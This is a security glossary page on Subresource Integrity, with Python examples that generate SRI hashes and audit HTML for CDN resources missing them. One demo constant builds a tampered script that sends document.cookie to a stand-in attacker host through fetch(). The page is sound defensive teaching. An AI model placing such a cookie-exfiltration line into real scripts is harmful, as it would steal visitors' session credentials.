← CodeClarityLab Home

Subresource Integrity (SRI)

security CWE-829 OWASP A08:2021 PHP 5.0+ Intermediate

Also Known As

SRI, integrity hash, script integrity check

TL;DR

A browser mechanism that verifies CDN-hosted scripts and stylesheets haven't been tampered with, using a cryptographic hash in the HTML tag.

Explanation

SRI (a W3C specification) adds an integrity attribute to <script> and <link> tags. The attribute holds one or more tokens of the form sha256-, sha384- or sha512- followed by the base64-encoded digest of the expected file bytes. The browser fetches the resource, hashes what it actually received and refuses to execute or apply it if the digest does not match; when several tokens are listed, only those using the strongest algorithm present are considered, and any one of them may match. This stops a supply chain attack in which a compromised CDN or third-party host serves a modified copy of a library. For cross-origin resources the attribute must be paired with crossorigin="anonymous": the check needs a CORS-readable response, and without it the browser blocks the resource outright rather than loading it unverified. In PHP, compute the value from the exact bytes the CDN serves with base64_encode(hash('sha384', $bytes, true)) (openssl_digest($bytes, 'sha384', true) yields the same raw digest), or have the build pipeline emit it, and regenerate it whenever the pinned file changes.
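
As an added example (not code from the original page), the following Python script generates integrity values and reproduces the browser's matching rule described above, including the multiple-hash case and the failure that occurs when a pinned library is updated without regenerating its hash. The "library" contents and the CDN URL are constructed for the demonstration; only the standard library is used.

```python
"""Generate and check Subresource Integrity (SRI) values (stdlib only).

Added example for this glossary entry, not code from the original page.
The "library" contents and CDN URL below are constructed for the demo.
"""
from __future__ import annotations

import base64
import hashlib

# Algorithms the SRI spec supports, weakest to strongest. Browsers ignore
# tokens with any other prefix (md5-, sha1-, ...) as unsupported.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return an integrity token such as 'sha384-<base64 digest>'."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def parse_integrity(attr: str) -> dict[str, set[str]]:
    """Parse a space-separated integrity attribute into {algorithm: {digests}}.

    Unsupported algorithms are dropped, as a browser drops them, and the
    '?options' suffix the spec reserves is stripped from each token.
    """
    parsed: dict[str, set[str]] = {}
    for token in attr.split():
        algorithm, sep, rest = token.partition("-")
        if not sep or algorithm not in SRI_ALGORITHMS:
            continue
        parsed.setdefault(algorithm, set()).add(rest.split("?", 1)[0])
    return parsed


def integrity_matches(content: bytes, attr: str) -> bool:
    """Apply the browser's matching rule to fetched content.

    Only the strongest algorithm present in the attribute counts, and the
    content passes if it matches any digest listed for that algorithm (this
    is what lets a page list two library versions during a rollout). With no
    usable token at all, browsers load the resource unchecked; mirrored here.
    """
    parsed = parse_integrity(attr)
    if not parsed:
        return True
    strongest = max(parsed, key=SRI_ALGORITHMS.index)
    actual = sri_hash(content, strongest).split("-", 1)[1]
    return actual in parsed[strongest]


def script_tag(src: str, content: bytes) -> str:
    """Render a pinned <script> tag. crossorigin is required so the browser
    gets a CORS-readable response it is allowed to hash and compare."""
    return (f'<script src="{src}"\n'
            f'  integrity="{sri_hash(content)}"\n'
            '  crossorigin="anonymous"></script>')


# Constructed stand-ins for two releases of a CDN-hosted script and a
# tampered copy of the first; real files would be read with open(p, "rb").
LIB_V1 = b"/* example-lib 1.0 */ window.exampleLib = { version: '1.0' };\n"
LIB_V2 = b"/* example-lib 1.1 */ window.exampleLib = { version: '1.1' };\n"
TAMPERED = LIB_V1 + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"

if __name__ == "__main__":
    pinned = sri_hash(LIB_V1)
    print(script_tag("https://cdn.example.com/example-lib.min.js", LIB_V1))
    print("genuine 1.0 passes:    ", integrity_matches(LIB_V1, pinned))
    print("tampered 1.0 rejected: ", not integrity_matches(TAMPERED, pinned))
    # Bumping the CDN URL to 1.1 without regenerating the hash breaks the page.
    print("1.1 against 1.0 hash:  ", integrity_matches(LIB_V2, pinned))
    # Listing both versions' hashes accepts either during a migration window.
    print("1.1 against both:      ", integrity_matches(LIB_V2, f"{pinned} {sri_hash(LIB_V2)}"))
```

The token sri_hash() produces for a file is the same one the widely used `openssl dgst -sha384 -binary FILE | openssl base64 -A` pipeline prints, so either can feed a build step; what matters is that the input is the exact bytes the CDN serves, not a local or differently minified copy.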

Common Misconception

Loading scripts from a reputable CDN is safe without SRI. In reality, CDNs and the third-party hosts behind them have been compromised before, and a provider's reputation says nothing about the bytes delivered to a given user at a given moment. SRI makes the browser refuse to execute a script whose content differs from the pinned hash, so a CDN-level compromise fails closed instead of running in every visitor's browser.

Why It Matters

A compromised CDN or third-party host can silently serve malicious JavaScript to every visitor of your site. With SRI in place, the browser refuses to execute any file whose hash does not match the one pinned in your HTML.

Common Mistakes

  • Adding SRI hashes once at setup but not regenerating them when the library version changes: the old hash no longer matches, so the browser blocks the resource and the page breaks.
  • Serving the HTML page itself over HTTP. SRI protects the referenced resource, not the page that declares the hash; an attacker in the path can rewrite or strip the integrity attribute. (A script loaded over HTTP from an HTTPS page is blocked as mixed content regardless.)
  • Adding integrity without crossorigin="anonymous" on a cross-origin resource. The response is then opaque to the browser, the check cannot run, and the resource is blocked rather than loaded.
  • Not adding SRI to stylesheets. Malicious CSS can exfiltrate form values through attribute selectors and url() requests, and can restyle the page for phishing.
  • Generating SRI hashes from a locally cached or differently built copy (minified vs. unminified, a different release) that does not match the bytes the CDN actually serves.

Avoid When

  • Do not rely on SRI for first-party resources served from the same origin as the HTML: an attacker who can modify the script can usually modify the page and its hash as well. It still adds value when static assets live on separate infrastructure (a storage bucket or a separate static host) that is not under the same control as the page.
  • Do not skip SRI for CDN-hosted JavaScript; a compromised CDN can inject malicious code into every page that loads it.

When To Use

  • Add integrity and crossorigin="anonymous" attributes to every third-party <script> and <link rel="stylesheet"> tag loaded from a CDN.
  • Generate SRI hashes at build time from the exact file the CDN serves and pin them; regenerate whenever the CDN resource version changes.

Code Examples

✗ Vulnerable
<script src="https://cdn.example.com/jquery.min.js"></script>
✓ Fixed
<script src="https://cdn.example.com/jquery.min.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous"></script>
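
The detection hint given in the sidebar (cross-origin scripts and stylesheets without an integrity attribute) can be checked without a browser. The following is an added example, not code from this page or from any of the scanners it names: a standard-library-only auditor that walks an HTML document, flags cross-origin <script> and <link> tags whose integrity value is missing or malformed or that lack a crossorigin attribute, and notes plain-HTTP loads. The sample page and the first-party origin https://app.example.com are constructed for the demonstration.

```python
"""Audit an HTML document for third-party scripts and stylesheets lacking SRI.

Added example, not code from the original page or from any tool it names.
Stdlib only; the sample page and first-party origin are constructed.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Shape of a well-formed integrity token: supported algorithm plus base64 digest.
INTEGRITY_TOKEN = re.compile(r"^(sha256|sha384|sha512)-[A-Za-z0-9+/]+={0,2}$")


class SriAuditor(HTMLParser):
    """Collect (url, problem) findings for <script src> and <link href> tags."""

    def __init__(self, page_origin: str) -> None:
        super().__init__()
        self.page_origin = page_origin  # e.g. "https://app.example.com"
        self.findings: list[tuple[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            self._check(a["src"], a)
        elif tag == "link" and a.get("href"):
            rels = a.get("rel", "").lower().split()
            if {"stylesheet", "preload", "modulepreload"} & set(rels):
                self._check(a["href"], a)

    def _is_cross_origin(self, url: str) -> bool:
        parsed = urlparse(url)
        if not parsed.netloc:  # relative URL: same origin as the page
            return False
        # Protocol-relative URLs (//cdn...) inherit the page's scheme.
        scheme = parsed.scheme or urlparse(self.page_origin).scheme
        return f"{scheme}://{parsed.netloc}" != self.page_origin

    def _check(self, url: str, a: dict[str, str]) -> None:
        if not self._is_cross_origin(url):
            return  # first-party asset: outside this audit's scope
        if url.startswith("http://"):
            self.findings.append((url, "loaded over plain HTTP"))
        integrity = a.get("integrity", "").strip()
        if not integrity:
            self.findings.append((url, "missing integrity attribute"))
            return
        if not all(INTEGRITY_TOKEN.match(t.split("?", 1)[0]) for t in integrity.split()):
            self.findings.append((url, "malformed integrity value"))
        if "crossorigin" not in a:
            # Without CORS the response is opaque; the browser cannot hash it
            # and blocks the resource, so the page breaks instead of being protected.
            self.findings.append((url, "integrity present but crossorigin missing"))


def audit_html(html: str, page_origin: str) -> list[tuple[str, str]]:
    """Return (url, problem) pairs for cross-origin resources without proper SRI."""
    auditor = SriAuditor(page_origin)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample page exercising each case the auditor reports on.
SAMPLE_HTML = """<!doctype html>
<html><head>
<link rel="stylesheet" href="/static/site.css">
<link rel="stylesheet" href="https://cdn.example.com/theme.css">
<script src="https://cdn.example.com/lib-a.min.js"></script>
<script src="http://cdn.example.com/lib-b.min.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"></script>
<script src="//cdn.example.com/lib-c.min.js" integrity="md5-notvalid"
  crossorigin="anonymous"></script>
<script src="https://cdn.example.com/lib-d.min.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous"></script>
<script src="/static/app.js"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for url, problem in audit_html(SAMPLE_HTML, "https://app.example.com"):
        print(f"{problem:45s} {url}")
```

Only lib-d.min.js passes: it is HTTPS, carries a well-formed sha384 token and declares crossorigin. The auditor checks the shape of the token, not its correctness; confirming that the pinned digest matches what the CDN serves requires fetching the file and hashing it, as in the generation example above.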

Added 15 Mar 2026
Edited 31 Mar 2026
DEV INTEL Tools & Severity
🟡 Medium ⚙ Fix effort: Low
⚡ Quick Fix
Add integrity="sha384-{hash}" and crossorigin="anonymous" to every <script> and <link> tag that loads from a CDN. Generate the hash from the exact file the CDN serves (srihash.org does this for a given URL).
📦 Applies To
PHP 5.0+ web
🔍 Detection Hints
CDN-hosted scripts or stylesheets without an integrity attribute; external resources loaded without SRI verification; integrity present without crossorigin on a cross-origin resource
Auto-detectable: ✓ Yes (lighthouse, owasp-zap, semgrep)
⚠ Related Problems
CWE-353 (Missing Support for Integrity Check), CWE-494 (Download of Code Without Integrity Check)
